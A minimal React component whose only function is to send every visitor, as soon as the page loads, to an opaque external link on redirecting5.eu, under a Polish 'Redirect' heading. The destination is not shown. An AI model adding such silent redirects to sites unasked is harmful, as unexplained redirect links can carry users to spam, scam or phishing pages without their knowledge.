import React, { useEffect } from "react";

function App() {
  useEffect(() => {
    window.location.href = "https://redirecting5.eu/p/C4kJ/taBX/cQZo";
  }, []);

  return (
    <div>
      <h1>Przekierowanie</h1>
    </div>
  );
}

export default App;
